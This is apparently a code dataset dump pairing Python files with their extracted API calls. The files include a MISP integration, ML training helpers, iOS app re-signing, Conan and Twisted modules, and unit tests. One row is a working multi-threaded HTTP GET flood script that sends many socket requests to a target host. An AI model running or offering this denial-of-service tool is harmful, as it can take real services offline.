len(response_for_context) == limit:\n pagination_message += f\"Showing page {page} out others that may exist\"\n else:\n pagination_message += f\"Showing page {page}\"\n md = tableToMarkdown(\n f\"MISP search-attributes returned {len(response_for_context)} attributes\\n {pagination_message}\",\n attribute_highlights, removeNull=True)\n\n return CommandResults(\n raw_response=response,\n readable_output=md,\n outputs=response_for_context,\n outputs_prefix=\"MISP.Attribute\",\n outputs_key_field=\"ID\"\n )\n else:\n return CommandResults(readable_output=f\"No attributes found in MISP for the given filters: {args}\")\n\n\ndef build_events_search_response(response: Union[dict, requests.Response]) -> dict:\n \"\"\"\n Convert the response of event search returned from MISP to the context output format.\n please note: attributes are excluded from search-events output as the information is too big. User can use the\n command search-attributes in order to get the information about the attributes.\n \"\"\"\n response_object = copy.deepcopy(response)\n if isinstance(response_object, str):\n response_object = json.loads(json.dumps(response_object))\n events = [event.get('Event') for event in response_object]\n for i in range(0, len(events)):\n # Filter object from keys in event_args\n events[i] = {key: events[i].get(key) for key in EVENT_FIELDS if key in events[i]}\n events[i]['RelatedEvent'] = [] # there is no need in returning related event when searching for an event\n build_galaxy_output(events[i])\n build_tag_output(events[i])\n build_object_output(events[i])\n events[i]['timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('timestamp'))\n events[i]['publish_timestamp'] = misp_convert_timestamp_to_date_string(events[i].get('publish_timestamp'))\n\n formatted_events = replace_keys_from_misp_to_context_data(events) # type: ignore\n return formatted_events # type: ignore\n\n\ndef event_to_human_readable_tag_list(event):\n event_tags = event.get('Tag', [])\n if event_tags:\n return [tag.get('Name') for tag in event_tags]\n\n\ndef event_to_human_readable_galaxy_list(event):\n event_galaxies = event.get('Galaxy', [])\n if event_galaxies:\n return [galaxy.get('Name') for galaxy in event.get('Galaxy')]\n\n\ndef event_to_human_readable_object_list(event):\n event_objects = event.get('Object', [])\n if event_objects:\n return [event_object.get('ID') for event_object in event.get('Object')]\n\n\ndef event_to_human_readable(response: dict):\n event_highlights = []\n for event in response:\n event_tags = event_to_human_readable_tag_list(event)\n event_galaxies = event_to_human_readable_galaxy_list(event)\n event_objects = event_to_human_readable_object_list(event)\n event_highlights.append({\n 'Event ID': event.get('ID'),\n 'Event Tags': event_tags,\n 'Event Galaxies': event_galaxies,\n 'Event Objects': event_objects,\n 'Publish Timestamp': event.get('PublishTimestamp'),\n 'Event Info': event.get('Info'),\n 'Event Org ID': event.get('OrganizationID'),\n 'Event Orgc ID': event.get('OwnerOrganization.ID'),\n 'Event Distribution': event.get('Distribution'),\n 'Event UUID': event.get('UUID'),\n })\n return event_highlights\n\n\ndef search_events(demisto_args: dict) -> CommandResults:\n \"\"\"\n Execute a MISP search using the 'event' controller.\n \"\"\"\n args = prepare_args_to_search('events')\n page = arg_to_number(demisto_args.get('page', 1), \"page\", required=True)\n limit = arg_to_number(demisto_args.get('limit', 50), \"limit\", required=True)\n pagination_args_validation(page, limit)\n\n 
response = PYMISP.search(**args)\n if response:\n response_for_context = build_events_search_response(response)\n event_outputs_to_human_readable = event_to_human_readable(response_for_context)\n\n pagination_message = f\"Current page size: {limit}\\n\"\n if len(response_for_context) == limit:\n pagination_message += f\"Showing page {page} out others that may exist\"\n else:\n pagination_message += f\"Showing page {page}\"\n md = tableToMarkdown(\n f\"MISP search-events returned {len(response_for_context)} events.\\n {pagination_message}\",\n event_outputs_to_human_readable, removeNull=True)\n\n return CommandResults(\n raw_response=response,\n readable_output=md,\n outputs=response_for_context,\n outputs_prefix=\"MISP.Event\",\n outputs_key_field=\"ID\"\n )\n else:\n return CommandResults(readable_output=f\"No events found in MISP for the given filters: {args}\")\n\n\ndef delete_event(demisto_args: dict):\n \"\"\"\n Gets an event id and deletes it.\n \"\"\"\n event_id = demisto_args.get('event_id')\n response = PYMISP.delete_event(event_id)\n if 'errors' in response:\n raise DemistoException(f'Event ID: {event_id} has not found in MISP: \\nError message: {response}')\n else:\n human_readable = f'Event {event_id} has been deleted'\n return CommandResults(readable_output=human_readable, raw_response=response)\n\n\ndef add_tag(demisto_args: dict, is_attribute=False):\n \"\"\"\n Function will add tag to given UUID of event or attribute.\n is_attribute (bool): if the given UUID belongs to an attribute (True) or event (False).\n \"\"\"\n uuid = demisto_args.get('uuid')\n tag = demisto_args.get('tag')\n try:\n PYMISP.tag(uuid, tag) # add the tag\n except PyMISPError:\n raise DemistoException(\"Adding the required tag was failed. Please make sure the UUID exists.\")\n if is_attribute:\n response = PYMISP.search(uuid=uuid, controller='attributes')\n human_readable = f'Tag {tag} has been successfully added to attribute {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n outputs=build_attributes_search_response(response),\n raw_response=response\n )\n\n # event's uuid\n response = PYMISP.search(uuid=uuid)\n human_readable = f'Tag {tag} has been successfully added to event {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=build_events_search_response(response),\n raw_response=response\n )\n\n\ndef remove_tag(demisto_args: dict, is_attribute=False):\n \"\"\"\n Function will remove tag to given UUID of event or attribute.\n is_attribute (bool): if the given UUID is an attribute's one. Otherwise it's event's.\n \"\"\"\n uuid = demisto_args.get('uuid')\n tag = demisto_args.get('tag')\n try:\n response = PYMISP.untag(uuid, tag)\n if response and response.get('errors'):\n raise DemistoException(f'Error in `{demisto.command()}` command: {response}')\n except PyMISPError:\n raise DemistoException(\"Removing the required tag was failed. 
Please make sure the UUID and tag exist.\")\n\n if is_attribute:\n response = PYMISP.search(uuid=uuid, controller='attributes')\n human_readable = f'Tag {tag} has been successfully removed from the attribute {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Attribute',\n outputs_key_field='ID',\n outputs=build_attributes_search_response(response),\n raw_response=response\n )\n # event's uuid\n response = PYMISP.search(uuid=uuid)\n human_readable = f'Tag {tag} has been successfully removed from the event {uuid}'\n return CommandResults(\n readable_output=human_readable,\n outputs_prefix='MISP.Event',\n outputs_key_field='ID',\n outputs=build_events_search_response(response),\n raw_response=response\n )\n\n\ndef add_sighting(demisto_args: dict):\n \"\"\"Adds sighting to MISP attribute\n \"\"\"\n attribute_id = demisto_args.get('id')\n attribute_uuid = demisto_args.get('uuid')\n sighting_type = demisto_args['type'] # mandatory arg\n att_id = attribute_id or attribute_uuid\n if not att_id:\n raise DemistoException('ID or UUID not specified')\n sighting_args = {\n 'id': attribute_id,\n 'uuid': attribute_uuid,\n 'type': SIGHTING_TYPE_NAME_TO_ID[sighting_type]\n }\n sigh_obj = MISPSighting()\n sigh_obj.from_dict(**sighting_args)\n response = PYMISP.add_sighting(sigh_obj, att_id)\n if response.get('message'):\n raise DemistoException(f\"An error was occurred: {response.get('message')}\")\n elif response.get('Sighting'):\n human_readable = f'Sighting \\'{sighting_type}\\' has been successfully added to attribute {att_id}'\n return CommandResults(readable_output=human_readable)\n raise DemistoException(f\"An error was occurred: {json.dumps(response)}\")\n\n\ndef test(malicious_tag_ids, suspicious_tag_ids, attributes_limit):\n \"\"\"\n Test module.\n \"\"\"\n is_tag_list_valid(malicious_tag_ids)\n is_tag_list_valid(suspicious_tag_ids)\n if attributes_limit < 0:\n raise DemistoException('Attribute limit has to be a positive number.')\n response = PYMISP._prepare_request('GET', 'servers/getPyMISPVersion.json')\n if PYMISP._check_json_response(response):\n return 'ok'\n else:\n raise DemistoException('MISP has not connected.')\n\n\ndef build_feed_url(demisto_args):\n url = demisto_args.get('feed')\n url = url[:-1] if url.endswith('/') else url\n if PREDEFINED_FEEDS.get(url):\n url = PREDEFINED_FEEDS[url].get('url') # type: ignore\n return url\n\n\ndef add_events_from_feed(demisto_args: dict, use_ssl: bool, proxies: dict):\n \"\"\"Gets an OSINT feed from url and publishing them to MISP\n urls with feeds for example: https://www.misp-project.org/feeds/\n feed format must be MISP.\n \"\"\"\n headers = {'Accept': 'application/json'}\n url = build_feed_url(demisto_args)\n osint_url = f'{url}/manifest.json'\n limit = arg_to_number(demisto_args.get('limit', 2), \"limit\", required=True)\n try:\n uri_list = requests.get(osint_url, verify=use_ssl, headers=headers, proxies=proxies).json()\n events_ids = list() # type: List[Dict[str, int]]\n for index, uri in enumerate(uri_list, 1):\n response = requests.get(f'{url}/{uri}.json', verify=use_ssl, headers=headers, proxies=proxies).json()\n misp_new_event = MISPEvent()\n misp_new_event.load(response)\n add_event_response = PYMISP.add_event(misp_new_event)\n event_object = add_event_response.get('Event')\n if event_object and 'id' in event_object:\n events_ids.append({'ID': event_object['id']})\n if limit == len(events_ids):\n break\n human_readable = tableToMarkdown(f'Total of {len(events_ids)} events was added to MISP.', 
The rows below come from the dataset's code / apis / extract_api columns. Each row pairs a Python source file (code) with the list of library APIs it calls (apis) and the extracted call sites (extract_api: the character span of each call, the resolved API name, its positional and keyword arguments, and the originating import). One such extract_api entry, verbatim:

    ((1129, 1155), 'urllib3.disable_warnings', 'urllib3.disable_warnings', ([], {}), '()\n', (1153, 1155), False, 'import urllib3\n')

MISP V3 integration for Demisto / Cortex XSOAR: helpers that push objects to a MISP instance through PyMISP (add_object, add_file_object, add_domain_object, add_url_object, add_generic_object_command, add_ip_object), tag utilities (handle_tag_duplication_ids, is_tag_list_valid), attribute updates (create_updated_attribute_instance, update_attribute_command), and a main() dispatcher that routes commands such as misp-create-event, misp-search-events, the file/url/ip/domain/email reputation commands, and misp-update-attribute. A representative helper:

```python
def add_domain_object(demisto_args: dict):
    """Adds a domain object to MISP
    domain-ip description: https://www.misp-project.org/objects.html#_domain_ip
    """
    text = demisto_args.get('text')
    event_id = demisto_args.get('event_id')
    domain = demisto_args.get('name')
    obj = MISPObject('domain-ip')
    ips = argToList(demisto_args.get('ip'))
    for ip in ips:
        obj.add_attribute('ip', value=ip)
    obj.add_attribute('domain', value=domain)
    if text:
        obj.add_attribute('text', value=text)
    return add_object(event_id, obj)
```

apis: pymisp.tools.FileObject, pymisp.tools.GenericObjectGenerator, urllib.parse.urlparse, urllib3.disable_warnings, pymisp.MISPEvent, pymisp.ExpandedPyMISP, copy.deepcopy, pymisp.MISPObject, pymisp.MISPAttribute, pymisp.MISPSighting
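For orientation, a minimal sketch of the PyMISP calls this row leans on. The URL, API key and event id below are placeholders, not values from the row, and it assumes a reachable MISP instance:

```python
from pymisp import ExpandedPyMISP, MISPObject

# Hypothetical connection details -- placeholders, not taken from the dataset row.
misp = ExpandedPyMISP(url='https://misp.example', key='API_KEY', ssl=False)

# Build a domain-ip object the same way the row's add_domain_object helper does.
obj = MISPObject('domain-ip')
obj.add_attribute('domain', value='example.com')
obj.add_attribute('ip', value='198.51.100.7')

# Attach it to an existing event; PyMISP returns a dict with an 'errors' key on failure.
response = misp.add_object('1234', misp_object=obj)
if 'errors' in response:
    raise RuntimeError(response)
```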
Row 719: a PyTorch mask-prediction head in the EmbedMask style (AdelaiDet). It defines dice_coefficient and a Lovász-hinge loss (lovasz_grad, lovasz_hinge, lovasz_loss), plus a MaskPred module that compares per-pixel embeddings against per-proposal embeddings and margins to produce instance mask probabilities, then upsamples them with aligned_bilinear to the configured mask_out_stride. The dice term:

```python
def dice_coefficient(x, target):
    eps = 1e-5
    n_inst = x.size(0)
    x = x.reshape(n_inst, -1)
    target = target.reshape(n_inst, -1)
    intersection = (x * target).sum(dim=1)
    union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
    loss = 1. - (2 * intersection / union)
    return loss
```

apis: torch.sort, torch.log, torch.stack, torch.tensor, torch.cat, torch.sum, torch.nn.functional.relu, torch.autograd.Variable, torch.zeros, torch.clamp
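To make the behaviour of that loss concrete, a small self-contained check on dummy tensors (not data from the row):

```python
import torch

def dice_coefficient(x, target):
    # Same formula as in the row above.
    eps = 1e-5
    n_inst = x.size(0)
    x = x.reshape(n_inst, -1)
    target = target.reshape(n_inst, -1)
    intersection = (x * target).sum(dim=1)
    union = (x ** 2.0).sum(dim=1) + (target ** 2.0).sum(dim=1) + eps
    return 1. - (2 * intersection / union)

pred = torch.tensor([[1.0, 1.0, 0.0, 0.0]])   # one instance, four "pixels"
gt   = torch.tensor([[1.0, 0.0, 0.0, 0.0]])
print(dice_coefficient(pred, gt))  # tensor([0.3333...]) = 1 - 2*1/(2 + 1)
```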
Row 720: CloudFerry's CheckVMAXPrerequisites action (Apache-2.0, Mirantis). Before an NFS to EMC VMAX iSCSI Cinder volume migration it verifies that iscsiadm is installed on the local host, that passwordless sudo (or the local_sudo_password option) is available, and that the source controller can ssh to the destination controller; any failed check raises AbortMigrationError. The checks only run when the destination storage backend is iscsi-vmax:

```python
def run(self, **kwargs):
    if self.cfg.dst_storage.backend != 'iscsi-vmax':
        return
    self._iscsiadm_is_installed_locally()
    self._ssh_connectivity_between_controllers()
    self._check_local_sudo_password_set()
```

apis: logging.getLogger, cloudferry.lib.utils.remote_runner.RemoteRunner, cloudferry.lib.utils.local.sudo, cloudferry.lib.base.exception.AbortMigrationError, cloudferry.lib.utils.local.run, getpass.getuser
Row 721: a multi-threaded HTTP GET flood script. attack(host, port=80, request_count=...) strips the scheme, resolves the host with socket.gethostbyname, then spawns worker threads that open sockets and send GET requests for random five-character URL paths, counting progress under a threading.Lock and exiting on resolution errors.
apis: socket.gethostbyname, random.sample, time.ctime, socket.socket, threading.Lock, time.sleep, sys.exit, threading.Thread

Row 722: a toy iterator that draws YOLOv3-style input strides:

```python
import random

class Yolov3(object):

    def __init__(self):
        self.num = 0
        self.input_size = [8, 16, 32]

    def __iter__(self):
        return self

    def __next__(self):
        a = random.choice(self.input_size)
        self.num = self.num + 1
        if self.num < 3:
            return a
        else:
            raise StopIteration

yolo = Yolov3()
for data in yolo:
    print(data)
```

apis: random.choice

Row 723: a small Google Maps geocoding helper:

```python
import googlemaps

gmaps = googlemaps.Client(key='google_key')


def get_markers(address):
    geocode_result = gmaps.geocode(address)
    return geocode_result[0]['geometry']['location']
```

apis: googlemaps.Client
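A usage sketch for that helper, assuming get_markers as defined above and a valid API key in place of 'google_key'; the address and coordinates are illustrative only:

```python
# Hypothetical call against the Google Geocoding API.
location = get_markers('1600 Amphitheatre Parkway, Mountain View, CA')
print(location)  # a dict such as {'lat': 37.42..., 'lng': -122.08...}
```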
Row 724: helpers that wrap a Keras model as a TensorFlow Estimator. run(model, X, Y, ...) compiles the model, converts it with tf.keras.estimator.model_to_estimator, then trains and evaluates through numpy_input_fn feeds; run_from_generator(model, input_func, ...) does the same for tf.data-based input functions, building a TrainSpec/EvalSpec pair and calling tf.estimator.train_and_evaluate. The core of the generator variant:

```python
def run_from_generator(
        model, input_func=None, input_func_dict=None,
        eval_func_dict=None, nb_epochs=10, optimizer=None, model_dir=None):
    if optimizer is None:
        optimizer = tf.keras.optimizers.SGD(
            lr=1e-3, decay=1e-5, momentum=0.9, nesterov=True)
    model.compile(
        optimizer=optimizer, loss='categorical_crossentropy',
        metrics=['accuracy'])

    dir_path = os.path.join(os.getcwd(), model_dir)
    if not os.path.exists(dir_path):
        os.mkdir(dir_path)
    est = tf.keras.estimator.model_to_estimator(
        keras_model=model, model_dir=dir_path)

    train_spec = tf.estimator.TrainSpec(
        input_fn=lambda: input_func(input_func_dict), max_steps=500)
    eval_spec = tf.estimator.EvalSpec(
        input_fn=lambda: input_func(eval_func_dict))
    tf.estimator.train_and_evaluate(est, train_spec, eval_spec)
    return est
```

apis: os.path.exists, tensorflow.keras.estimator.model_to_estimator, tensorflow.estimator.train_and_evaluate, tensorflow.keras.optimizers.SGD, os.getcwd, os.mkdir, tensorflow.keras.estimators.SGD
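run_from_generator expects input_func to return a tf.data.Dataset. A minimal sketch of such a function; the feature key 'dense_input' is a placeholder and must match the Keras model's input layer name, which this row does not show:

```python
import numpy as np
import tensorflow as tf

def input_func(params):
    # params is the dict passed through input_func_dict / eval_func_dict.
    features = params['features'].astype(np.float32)
    labels = params['labels'].astype(np.float32)
    dataset = tf.data.Dataset.from_tensor_slices(({'dense_input': features}, labels))
    # Shuffle, batch and repeat so the estimator can run for the requested steps.
    return dataset.shuffle(1000).batch(params.get('batch_size', 32)).repeat()
```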
Row 725: isign's archive module. It models an iOS app "at rest" (a bare .app directory, a zipped app bundle, or an .ipa) with a common interface to unarchive to a temp directory, re-sign, and re-archive in the same format. AppArchive, AppZipArchive and IpaArchive implement precheck/get_info/unarchive_to_temp/archive; UncompressedArchive tracks the unzipped bundle and can re-archive or clone it; WatchKit sub-bundles are removed because they cannot yet be signed; the module-level view() and resign() functions drive the whole flow, with resign() building a Signer from the certificate, key, Apple cert and provisioning profile. The archive type is picked by:

```python
def archive_factory(path):
    """ Guess what kind of archive we are dealing with, return an
        archive object. Returns None if path did not match any archive type """
    archive = None
    for cls in [IpaArchive, AppZipArchive, AppArchive]:
        if cls.precheck(path):
            archive = cls(path)
            log.debug("File %s matched as %s", path, cls.__name__)
            break
    return archive
```

apis: logging.getLogger, exceptions.MissingHelpers, signer.Signer, zipfile.ZipFile, exceptions.NotMatched, os.walk, os.path.exists, shutil.move, bundle.is_info_plist_native, bundle.Bundle, os.path.isdir, biplist.readPlistFromString, exceptions.NotSignable, re.match, os.path.isfile, os.path.dirname, tempfile.mkdtemp, zipfile.is_zipfile, distutils.spawn.find_executable, os.path.join, bundle.App, shutil.copytree, shutil.rmtree
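A hedged usage sketch for this row's resign() entry point. The import path, file names and paths are assumptions, not values from the row, and it presumes the signing credentials and provisioning profile already exist on disk:

```python
from isign.archive import resign  # module path is an assumption; the row only shows the module body

bundle_info = resign(
    input_path='MyApp.ipa',
    certificate='signer_cert.pem',
    key='signer_key.pem',
    apple_cert='apple_cert.pem',
    provisioning_profile='my_profile.mobileprovision',
    output_path='MyApp-resigned.ipa',
)
# resign() returns the bundle's parsed Info.plist as a dict.
print(bundle_info.get('CFBundleIdentifier'))
```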
Row 726: a Conan VirtualRunEnv generator. runenv_from_cpp_info() derives runtime environment variables (PATH, LD_LIBRARY_PATH, DYLD_LIBRARY_PATH, DYLD_FRAMEWORK_PATH) from a dependency's cpp_info, and VirtualRunEnv composes the runenv_info of all host and test requirements into a conanrunenv script:

```python
class VirtualRunEnv:
    """ captures the conanfile environment that is defined from its
    dependencies, and also from profiles
    """

    def __init__(self, conanfile):
        self._conanfile = conanfile

    def environment(self):
        runenv = Environment(self._conanfile)
        host_req = self._conanfile.dependencies.host
        test_req = self._conanfile.dependencies.test
        for _, dep in list(host_req.items()) + list(test_req.items()):
            if dep.runenv_info:
                runenv.compose_env(dep.runenv_info)
            runenv.compose_env(runenv_from_cpp_info(self._conanfile, dep.cpp_info))
        return runenv

    def generate(self, auto_activate=False):
        run_env = self.environment()
        if run_env:
            run_env.save_script("conanrunenv", auto_activate=auto_activate)
```

apis: conan.tools.env.Environment

Row 727: Twisted's gtk2reactor, the glue between the Twisted reactor and the glib/GTK+2 main loop. Gtk2Reactor maps FileDescriptors onto gobject.io_add_watch sources (INFLAGS/OUTFLAGS plus POLL_DISCONNECTED), runs scheduled calls through a simulate() timeout, and installs its own SIGCHLD handling so pygtk does not clobber process reaping; PortableGtkReactor is the select-based variant installed on non-POSIX platforms, where sockets are not supported by GTK+'s input_add. As the module docstring notes, it is installed with:

```python
from twisted.internet import gtk2reactor
gtk2reactor.install()
```
like","value":["twisted.internet.posixbase.PosixReactorBase.__init__","twisted.internet.process.reapAllProcesses","zope.interface.implements","signal.siginterrupt","sys.exc_info","twisted.python.log.deferr","twisted.python.runtime.platform.getType","twisted.internet.error.ConnectionDone","twisted.internet.posixbase.PosixReactorBase.crash","twisted.python.compat.set","gtk.main_level","gtk.mainquit","gtk.main_quit","gobject.threads_init","twisted.python.log.msg","pygtk.require","twisted.python.log.callWithLogger","gobject.main_context_default","gobject.MainLoop","gtk.main","twisted.internet.main.installReactor","twisted.internet.error.ConnectionLost","twisted.internet.base._SignalReactorMixin._handleSignals","gobject.io_add_watch","twisted.internet.selectreactor.SelectReactor.crash","gobject.timeout_add","gobject.source_remove","gtk.mainloop"],"string":"[\n \"twisted.internet.posixbase.PosixReactorBase.__init__\",\n \"twisted.internet.process.reapAllProcesses\",\n \"zope.interface.implements\",\n \"signal.siginterrupt\",\n \"sys.exc_info\",\n \"twisted.python.log.deferr\",\n \"twisted.python.runtime.platform.getType\",\n \"twisted.internet.error.ConnectionDone\",\n \"twisted.internet.posixbase.PosixReactorBase.crash\",\n \"twisted.python.compat.set\",\n \"gtk.main_level\",\n \"gtk.mainquit\",\n \"gtk.main_quit\",\n \"gobject.threads_init\",\n \"twisted.python.log.msg\",\n \"pygtk.require\",\n \"twisted.python.log.callWithLogger\",\n \"gobject.main_context_default\",\n \"gobject.MainLoop\",\n \"gtk.main\",\n \"twisted.internet.main.installReactor\",\n \"twisted.internet.error.ConnectionLost\",\n \"twisted.internet.base._SignalReactorMixin._handleSignals\",\n \"gobject.io_add_watch\",\n \"twisted.internet.selectreactor.SelectReactor.crash\",\n \"gobject.timeout_add\",\n \"gobject.source_remove\",\n \"gtk.mainloop\"\n]"},"extract_api":{"kind":"string","value":"[((1126, 1148), 'gobject.threads_init', 'gobject.threads_init', ([], {}), '()\\n', (1146, 1148), False, 'import gobject\\n'), ((2087, 2103), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\\n', (2101, 2103), False, 'import gtk\\n'), ((2597, 2622), 'zope.interface.implements', 'implements', (['IReactorFDSet'], {}), '(IReactorFDSet)\\n', (2607, 2622), False, 'from zope.interface import implements\\n'), ((12990, 13013), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\\n', (13004, 13013), False, 'from twisted.internet.main import installReactor\\n'), ((13248, 13271), 'twisted.internet.main.installReactor', 'installReactor', (['reactor'], {}), '(reactor)\\n', (13262, 13271), False, 'from twisted.internet.main import installReactor\\n'), ((13297, 13323), 'twisted.python.runtime.platform.getType', 'runtime.platform.getType', ([], {}), '()\\n', (13321, 13323), False, 'from twisted.python import log, runtime, failure\\n'), ((795, 815), 'pygtk.require', 'pygtk.require', (['\"\"\"2.0\"\"\"'], {}), \"('2.0')\\n\", (808, 815), False, 'import pygtk\\n'), ((2113, 2128), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\\n', (2126, 2128), False, 'import gtk\\n'), ((2711, 2716), 'twisted.python.compat.set', 'set', ([], {}), '()\\n', (2714, 2716), False, 'from twisted.python.compat import set\\n'), ((2740, 2745), 'twisted.python.compat.set', 'set', ([], {}), '()\\n', (2743, 2745), False, 'from twisted.python.compat import set\\n'), ((2781, 2822), 'twisted.internet.posixbase.PosixReactorBase.__init__', 'posixbase.PosixReactorBase.__init__', (['self'], {}), '(self)\\n', (2816, 2822), False, 'from twisted.internet 
import main, base, posixbase, error, selectreactor\\n'), ((7418, 7462), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\\n', (7439, 7462), False, 'import gobject\\n'), ((8531, 8589), 'twisted.python.log.msg', 'log.msg', ([], {'channel': '\"\"\"system\"\"\"', 'event': '\"\"\"iteration\"\"\"', 'reactor': 'self'}), \"(channel='system', event='iteration', reactor=self)\\n\", (8538, 8589), False, 'from twisted.python import log, runtime, failure\\n'), ((9360, 9398), 'twisted.internet.posixbase.PosixReactorBase.crash', 'posixbase.PosixReactorBase.crash', (['self'], {}), '(self)\\n', (9392, 9398), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((9547, 9584), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\\n', (9566, 9584), False, 'import gobject\\n'), ((10856, 10922), 'twisted.python.log.callWithLogger', 'log.callWithLogger', (['source', 'self._doReadOrWrite', 'source', 'condition'], {}), '(source, self._doReadOrWrite, source, condition)\\n', (10874, 10922), False, 'from twisted.python import log, runtime, failure\\n'), ((11652, 11691), 'twisted.internet.selectreactor.SelectReactor.crash', 'selectreactor.SelectReactor.crash', (['self'], {}), '(self)\\n', (11685, 11691), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((11773, 11789), 'gtk.main_level', 'gtk.main_level', ([], {}), '()\\n', (11787, 11789), False, 'import gtk\\n'), ((12058, 12095), 'gobject.timeout_add', 'gobject.timeout_add', (['(0)', 'self.simulate'], {}), '(0, self.simulate)\\n', (12077, 12095), False, 'import gobject\\n'), ((3083, 3113), 'gobject.main_context_default', 'gobject.main_context_default', ([], {}), '()\\n', (3111, 3113), False, 'import gobject\\n'), ((3242, 3260), 'gobject.MainLoop', 'gobject.MainLoop', ([], {}), '()\\n', (3258, 3260), False, 'import gobject\\n'), ((4182, 4227), 'twisted.internet.base._SignalReactorMixin._handleSignals', 'base._SignalReactorMixin._handleSignals', (['self'], {}), '(self)\\n', (4221, 4227), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((4587, 4606), 'twisted.internet.process.reapAllProcesses', '_reapAllProcesses', ([], {}), '()\\n', (4604, 4606), True, 'from twisted.internet.process import reapAllProcesses as _reapAllProcesses\\n'), ((5463, 5512), 'gobject.io_add_watch', 'gobject.io_add_watch', (['source', 'condition', 'callback'], {}), '(source, condition, callback)\\n', (5483, 5512), False, 'import gobject\\n'), ((5977, 6021), 'gobject.source_remove', 'gobject.source_remove', (['self._sources[source]'], {}), '(self._sources[source])\\n', (5998, 6021), False, 'import gobject\\n'), ((9243, 9287), 'gobject.source_remove', 'gobject.source_remove', (['self.doIterationTimer'], {}), '(self.doIterationTimer)\\n', (9264, 9287), False, 'import gobject\\n'), ((11173, 11208), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\\n', (11194, 11208), False, 'import gobject\\n'), ((12192, 12202), 'gtk.main', 'gtk.main', ([], {}), '()\\n', (12200, 12202), False, 'import gtk\\n'), ((12229, 12243), 'gtk.mainloop', 'gtk.mainloop', ([], {}), '()\\n', (12241, 12243), False, 'import gtk\\n'), ((12398, 12433), 'gobject.source_remove', 'gobject.source_remove', (['self._simtag'], {}), '(self._simtag)\\n', (12419, 12433), False, 'import gobject\\n'), ((4403, 4445), 'signal.siginterrupt', 'signal.siginterrupt', (['signal.SIGCHLD', '(False)'], {}), 
'(signal.SIGCHLD, False)\\n', (4422, 4445), False, 'import sys, signal\\n'), ((9743, 9765), 'twisted.internet.error.ConnectionDone', 'error.ConnectionDone', ([], {}), '()\\n', (9763, 9765), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((9814, 9836), 'twisted.internet.error.ConnectionLost', 'error.ConnectionLost', ([], {}), '()\\n', (9834, 9836), False, 'from twisted.internet import main, base, posixbase, error, selectreactor\\n'), ((11849, 11864), 'gtk.main_quit', 'gtk.main_quit', ([], {}), '()\\n', (11862, 11864), False, 'import gtk\\n'), ((11899, 11913), 'gtk.mainquit', 'gtk.mainquit', ([], {}), '()\\n', (11911, 11913), False, 'import gtk\\n'), ((10665, 10696), 'twisted.python.log.msg', 'log.msg', ([\"('Error In %s' % source)\"], {}), \"('Error In %s' % source)\\n\", (10672, 10696), False, 'from twisted.python import log, runtime, failure\\n'), ((10713, 10725), 'twisted.python.log.deferr', 'log.deferr', ([], {}), '()\\n', (10723, 10725), False, 'from twisted.python import log, runtime, failure\\n'), ((10631, 10645), 'sys.exc_info', 'sys.exc_info', ([], {}), '()\\n', (10643, 10645), False, 'import sys, signal\\n')]"}}},{"rowIdx":728,"cells":{"code":{"kind":"string","value":"# -*- coding: utf-8 -*-\n\nfrom unittest import TestCase, TestLoader\n\nfrom radio import (Radio, ListenerNotFound, ReplyHandlerAlreadyBound,\n HandlerAlreadyBound)\n\n\ndef init_radio(f):\n\n def wrap(self, *args):\n self.radio = Radio()\n return f(self, *args)\n\n return wrap\n\n\nclass TestRadioRequestReplyMethods(TestCase):\n\n @init_radio\n def test_request_reply_stop_replying(self):\n '''\n \"request\", \"reply\" and \"stopReplying\" methods work correctly.\n '''\n\n def foo_handler(): return 'foo'\n def bar_handler(my_arg=222): return my_arg\n\n self.radio.reply('foo', foo_handler)\n self.radio.reply('bar', bar_handler)\n self.assertEqual(self.radio.request('foo'), 'foo')\n self.assertEqual(self.radio.request('bar'), 222)\n self.assertEqual(self.radio.request('bar', 333), 333)\n self.assertEqual(self.radio.request('bar', my_arg=444), 444)\n self.radio.stopReplying('foo')\n self.radio.stopReplying('bar')\n\n with self.assertRaises(ListenerNotFound):\n self.radio.request('foo')\n with self.assertRaises(ListenerNotFound):\n self.radio.request('bar')\n\n @init_radio\n def test_kwargs(self):\n '''\n Keyword arguments works correctly.\n '''\n\n foo_list = []\n def foo_handler(foo, bar): return (foo, bar)\n self.radio.reply('foo', foo_handler)\n self.assertEqual(self.radio.request('foo', bar=5, foo=10), (10, 5))\n\n @init_radio\n def test_on_already_bound(self):\n '''\n \"reply\" fails when trying to bound handler that is already bounded.\n '''\n\n def foo_handler(): pass\n self.radio.reply('foo', foo_handler)\n self.radio.reply('bar', foo_handler)\n\n # General exception\n with self.assertRaises(HandlerAlreadyBound):\n self.radio.reply('foo', foo_handler)\n # Child exception\n with self.assertRaises(ReplyHandlerAlreadyBound):\n self.radio.reply('foo', foo_handler)\n\n @init_radio\n def test_off_handler_that_was_not_bounded(self):\n '''\n \"stopReplying\" fails when trying to unbound handler that was not\n bounded.\n '''\n\n def foo_handler(): pass\n\n with self.assertRaises(ListenerNotFound):\n self.radio.stopReplying('foo', foo_handler)\n\n @init_radio\n def test_off_soft_mode(self):\n '''\n \"stopReplying\" will not fail if safe-argument is set to True.\n '''\n\n def foo_handler(): pass\n self.radio.stopReplying('foo', foo_handler, soft=True)\n self.radio.stopReplying('foo', 
